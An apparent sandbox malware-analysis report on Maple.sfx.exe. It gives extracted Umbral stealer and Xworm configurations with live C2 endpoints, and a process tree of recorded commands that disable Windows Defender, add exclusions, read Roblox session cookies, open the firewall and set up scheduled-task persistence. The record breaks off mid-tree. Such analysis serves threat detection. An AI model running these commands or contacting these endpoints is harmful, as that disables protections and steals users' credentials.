Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15-12-2024 05:33

General

  • Target

    Maple.sfx.exe

  • Size

    49.9MB

  • MD5

    b6eb7b6c81c32e94112f00a4bd7fbc80

  • SHA1

    328d30384ac99a4b24ebb78fe1ccde41444191a7

  • SHA256

    5db2db5c8a468b925bdf13bb3f11244af1c7dbc86a6f5727b724bf1961c5e5e2

  • SHA512

    94e1d9a2899f7d2a210dc76615923be8475a8f89c9484d56f3ee2c9c28cf75a13051df8dd068835261bcab62e12a4c57bbb41efa0b7783b8b1138b314649f003

  • SSDEEP

    1572864:wOyrjq1zExjMkfCfYFvWExN+ZJupU485C3Kc68:wOscE9Mkfnb1pUTC3P68

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1260642804414156891/hKfLDYiwORnJS0u7NEs9WPwqTyOYiJyHsbqndD7MezE-rhVSLHFDRhBZ_hNqb3v9ZoeE

Extracted

Family

xworm

Version

5.0

C2

testarosa.duckdns.org:7110

Mutex

5ZpeoOe6AtQfr6wU

Attributes
  • Install_directory

    %AppData%

  • install_file

    Ondrive.exe

aes.plain

Signatures

  • Detect Umbral payload 2 IoCs
  • Detect Xworm Payload 2 IoCs
  • Njrat family
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Umbral family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 23 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 64 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 64 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 44 IoCs
  • Looks up external IP address via web service 23 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 61 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 44 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Detects videocard installed 1 TTPs 22 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 22 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 23 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Maple.sfx.exe
    "C:\Users\Admin\AppData\Local\Temp\Maple.sfx.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2784
    • C:\Users\Admin\AppData\Local\Temp\loader.exe
      "C:\Users\Admin\AppData\Local\Temp\loader.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:516
      • C:\Users\Admin\AppData\Local\Temp\Server.exe
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1344
        • C:\Users\Admin\AppData\Roaming\Server.exe
          "C:\Users\Admin\AppData\Roaming\Server.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:3832
          • C:\Users\Admin\AppData\Local\Temp\server.exe
            "C:\Users\Admin\AppData\Local\Temp\server.exe"
            5⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • System Location Discovery: System Language Discovery
            PID:4664
            • C:\Windows\SysWOW64\netsh.exe
              netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
              6⤵
              • Modifies Windows Firewall
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:3492
        • C:\Users\Admin\AppData\Roaming\conhost.exe
          "C:\Users\Admin\AppData\Roaming\conhost.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious behavior: AddClipboardFormatListener
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2124
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\conhost.exe'
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:1668
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'conhost.exe'
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:5024
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Ondrive.exe'
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:4124
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Ondrive.exe'
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:2776
          • C:\Windows\System32\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Ondrive" /tr "C:\Users\Admin\AppData\Roaming\Ondrive.exe"
            5⤵
            • Scheduled Task/Job: Scheduled Task
            PID:1992
      • C:\Users\Admin\AppData\Local\Temp\Maple.exe
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        3⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4940
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" csproduct get uuid
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:904
        • C:\Windows\SYSTEM32\attrib.exe
          "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
          4⤵
          • Views/modifies file attributes
          PID:2872
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4040
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1784
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4512
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4500
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" os get Caption
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3196
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" computersystem get totalphysicalmemory
          4⤵
            PID:4380
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic.exe" csproduct get uuid
            4⤵
              PID:1572
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:5048
            • C:\Windows\System32\Wbem\wmic.exe
              "wmic" path win32_VideoController get name
              4⤵
              • Detects videocard installed
              PID:1812
            • C:\Windows\SYSTEM32\cmd.exe
              "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
              4⤵
              • System Network Configuration Discovery: Internet Connection Discovery
              • Suspicious use of WriteProcessMemory
              PID:4820
              • C:\Windows\system32\PING.EXE
                ping localhost
                5⤵
                • System Network Configuration Discovery: Internet Connection Discovery
                • Runs ping.exe
                PID:1120
          • C:\Users\Admin\AppData\Local\Temp\loader.exe
            "C:\Users\Admin\AppData\Local\Temp\loader.exe"
            3⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:4204
            • C:\Users\Admin\AppData\Local\Temp\Server.exe
              "C:\Users\Admin\AppData\Local\Temp\Server.exe"
              4⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:1228
              • C:\Users\Admin\AppData\Roaming\Server.exe
                "C:\Users\Admin\AppData\Roaming\Server.exe"
                5⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:64
              • C:\Users\Admin\AppData\Roaming\conhost.exe
                "C:\Users\Admin\AppData\Roaming\conhost.exe"
                5⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:816
            • C:\Users\Admin\AppData\Local\Temp\Maple.exe
              "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
              4⤵
              • Executes dropped EXE
              PID:1900
            • C:\Users\Admin\AppData\Local\Temp\loader.exe
              "C:\Users\Admin\AppData\Local\Temp\loader.exe"
              4⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:1036
              • C:\Users\Admin\AppData\Local\Temp\Server.exe
                "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                5⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:3668
                • C:\Users\Admin\AppData\Roaming\Server.exe
                  "C:\Users\Admin\AppData\Roaming\Server.exe"
                  6⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:4400
                • C:\Users\Admin\AppData\Roaming\conhost.exe
                  "C:\Users\Admin\AppData\Roaming\conhost.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:3712
              • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                5⤵
                • Drops file in Drivers directory
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                PID:2920
                • C:\Windows\System32\Wbem\wmic.exe
                  "wmic.exe" csproduct get uuid
                  6⤵
                    PID:4724
                  • C:\Windows\SYSTEM32\attrib.exe
                    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                    6⤵
                    • Views/modifies file attributes
                    PID:1480
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
                    6⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4028
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                    6⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3012
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                    6⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4516
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                    6⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4564
                  • C:\Windows\System32\Wbem\wmic.exe
                    "wmic.exe" os get Caption
                    6⤵
                      PID:8
                    • C:\Windows\System32\Wbem\wmic.exe
                      "wmic.exe" computersystem get totalphysicalmemory
                      6⤵
                        PID:4124
                        • C:\Windows\System32\Conhost.exe
                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          7⤵
                            PID:2776
                        • C:\Windows\System32\Wbem\wmic.exe
                          "wmic.exe" csproduct get uuid
                          6⤵
                            PID:2256
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                            6⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious behavior: EnumeratesProcesses
                            PID:3100
                          • C:\Windows\System32\Wbem\wmic.exe
                            "wmic" path win32_VideoController get name
                            6⤵
                            • Detects videocard installed
                            PID:3220
                          • C:\Windows\SYSTEM32\cmd.exe
                            "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
                            6⤵
                            • System Network Configuration Discovery: Internet Connection Discovery
                            PID:1740
                            • C:\Windows\system32\PING.EXE
                              ping localhost
                              7⤵
                              • System Network Configuration Discovery: Internet Connection Discovery
                              • Runs ping.exe
                              PID:2424
                        • C:\Users\Admin\AppData\Local\Temp\loader.exe
                          "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                          5⤵
                          • Checks computer location settings
                          • Executes dropped EXE
                          PID:4612
                          • C:\Users\Admin\AppData\Local\Temp\Server.exe
                            "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                            6⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:1704
                          • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                            "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                            6⤵
                            • Executes dropped EXE
                            PID:1152
                          • C:\Users\Admin\AppData\Local\Temp\loader.exe
                            "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                            6⤵
                            • Checks computer location settings
                            • Executes dropped EXE
                            PID:2864
                            • C:\Users\Admin\AppData\Local\Temp\Server.exe
                              "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                              7⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              PID:4476
                            • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                              "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                              7⤵
                              • Executes dropped EXE
                              PID:1920
                            • C:\Users\Admin\AppData\Local\Temp\loader.exe
                              "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                              7⤵
                              • Checks computer location settings
                              • Executes dropped EXE
                              PID:1260
                              • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                8⤵
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                PID:228
                              • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                8⤵
                                • Drops file in Drivers directory
                                • Executes dropped EXE
                                • Suspicious behavior: EnumeratesProcesses
                                PID:512
                                • C:\Windows\System32\Wbem\wmic.exe
                                  "wmic.exe" csproduct get uuid
                                  9⤵
                                    PID:4292
                                  • C:\Windows\SYSTEM32\attrib.exe
                                    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                    9⤵
                                    • Views/modifies file attributes
                                    PID:4084
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
                                    9⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:2024
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                    9⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:952
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                    9⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:2216
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                    9⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:2716
                                  • C:\Windows\System32\Wbem\wmic.exe
                                    "wmic.exe" os get Caption
                                    9⤵
                                      PID:2144
                                    • C:\Windows\System32\Wbem\wmic.exe
                                      "wmic.exe" computersystem get totalphysicalmemory
                                      9⤵
                                        PID:3176
                                      • C:\Windows\System32\Wbem\wmic.exe
                                        "wmic.exe" csproduct get uuid
                                        9⤵
                                          PID:1300
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                          9⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:1668
                                        • C:\Windows\System32\Wbem\wmic.exe
                                          "wmic" path win32_VideoController get name
                                          9⤵
                                          • Detects videocard installed
                                          PID:2752
                                          • C:\Windows\System32\Conhost.exe
                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            10⤵
                                              PID:4292
                                          • C:\Windows\SYSTEM32\cmd.exe
                                            "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
                                            9⤵
                                            • System Network Configuration Discovery: Internet Connection Discovery
                                            PID:2372
                                            • C:\Windows\system32\PING.EXE
                                              ping localhost
                                              10⤵
                                              • System Network Configuration Discovery: Internet Connection Discovery
                                              • Runs ping.exe
                                              PID:2192
                                        • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                          "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                          8⤵
                                          • Checks computer location settings
                                          • Executes dropped EXE
                                          PID:536
                                          • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                            "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                            9⤵
                                            • Executes dropped EXE
                                            • System Location Discovery: System Language Discovery
                                            PID:1612
                                          • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                            "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                            9⤵
                                            • Executes dropped EXE
                                            PID:1128
                                          • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                            "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                            9⤵
                                            • Checks computer location settings
                                            • Executes dropped EXE
                                            PID:4880
                                            • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                              "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                              10⤵
                                              • Executes dropped EXE
                                              • System Location Discovery: System Language Discovery
                                              PID:3508
                                            • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                              "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                              10⤵
                                              • Executes dropped EXE
                                              PID:2616
                                            • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                              "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                              10⤵
                                              • Checks computer location settings
                                              • Executes dropped EXE
                                              PID:4912
                                              • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                                11⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                PID:3604
                                              • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                                "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                11⤵
                                                • Drops file in Drivers directory
                                                • Executes dropped EXE
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:3080
                                                • C:\Windows\System32\Wbem\wmic.exe
                                                  "wmic.exe" csproduct get uuid
                                                  12⤵
                                                    PID:3532
                                                  • C:\Windows\SYSTEM32\attrib.exe
                                                    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                    12⤵
                                                    • Views/modifies file attributes
                                                    PID:1160
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
                                                    12⤵
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:1724
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                    12⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:3036
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                    12⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:3812
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                    12⤵
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:3480
                                                  • C:\Windows\System32\Wbem\wmic.exe
                                                    "wmic.exe" os get Caption
                                                    12⤵
                                                      PID:3112
                                                    • C:\Windows\System32\Wbem\wmic.exe
                                                      "wmic.exe" computersystem get totalphysicalmemory
                                                      12⤵
                                                        PID:3192
                                                      • C:\Windows\System32\Wbem\wmic.exe
                                                        "wmic.exe" csproduct get uuid
                                                        12⤵
                                                          PID:5024
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                          12⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          PID:3204
                                                        • C:\Windows\System32\Wbem\wmic.exe
                                                          "wmic" path win32_VideoController get name
                                                          12⤵
                                                          • Detects videocard installed
                                                          PID:1352
                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                          "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
                                                          12⤵
                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                          PID:3952
                                                          • C:\Windows\system32\PING.EXE
                                                            ping localhost
                                                            13⤵
                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                            • Runs ping.exe
                                                            PID:4464
                                                      • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                                        11⤵
                                                        • Checks computer location settings
                                                        • Executes dropped EXE
                                                        PID:3980
                                                        • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                                          12⤵
                                                          • Executes dropped EXE
                                                          • System Location Discovery: System Language Discovery
                                                          PID:1364
                                                        • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                          12⤵
                                                          • Executes dropped EXE
                                                          PID:3512
                                                        • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                                          12⤵
                                                          • Checks computer location settings
                                                          • Executes dropped EXE
                                                          PID:4964
                                                          • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                                            13⤵
                                                            • Executes dropped EXE
                                                            • System Location Discovery: System Language Discovery
                                                            PID:228
                                                          • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                            13⤵
                                                            • Executes dropped EXE
                                                            PID:2216
                                                          • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                                            13⤵
                                                            • Checks computer location settings
                                                            • Executes dropped EXE
                                                            PID:2712
                                                            • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                                              14⤵
                                                              • Executes dropped EXE
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2668
                                                            • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                              14⤵
                                                              • Drops file in Drivers directory
                                                              • Executes dropped EXE
                                                              PID:2848
                                                              • C:\Windows\System32\Wbem\wmic.exe
                                                                "wmic.exe" csproduct get uuid
                                                                15⤵
                                                                  PID:3548
                                                                • C:\Windows\SYSTEM32\attrib.exe
                                                                  "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                  15⤵
                                                                  • Views/modifies file attributes
                                                                  PID:5052
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
                                                                  15⤵
                                                                    PID:3412
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                                    15⤵
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    PID:1112
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                    15⤵
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    PID:3640
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                    15⤵
                                                                      PID:1364
                                                                    • C:\Windows\System32\Wbem\wmic.exe
                                                                      "wmic.exe" os get Caption
                                                                      15⤵
                                                                        PID:456
                                                                      • C:\Windows\System32\Wbem\wmic.exe
                                                                        "wmic.exe" computersystem get totalphysicalmemory
                                                                        15⤵
                                                                          PID:5024
                                                                        • C:\Windows\System32\Wbem\wmic.exe
                                                                          "wmic.exe" csproduct get uuid
                                                                          15⤵
                                                                            PID:2200
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
